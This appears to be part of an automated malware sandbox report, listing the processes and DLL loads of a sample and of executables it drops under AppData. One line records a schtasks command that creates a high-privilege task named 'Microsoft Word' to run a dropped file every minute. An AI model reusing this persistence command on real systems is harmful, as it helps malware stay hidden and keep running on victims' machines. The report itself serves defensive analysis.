Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: mscoree.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: edgegdi.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: amsi.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: userenv.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: profapi.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: sxs.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: devenum.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: devobj.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msasn1.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msdmo.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rasapi32.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rasman.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rtutils.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: winhttp.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: winnsi.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: secur32.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: schannel.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: netfxperf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: esentprf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfts.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: utildll.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msdtcuiu.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: atl.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msdtcprx.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: mtxclu.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: clusapi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: resutils.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: msscntrs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfdisk.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wmiclnt.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfnet.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: browcli.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfos.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfproc.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: sysmain.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: rasctrs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: tapiperf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: perfctrs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: usbperf.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: tquery.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: twext.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: cscui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: shacct.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: idstore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wlidprov.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: provsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: acppage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: aepic.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ondemandconnroutehelper.dll
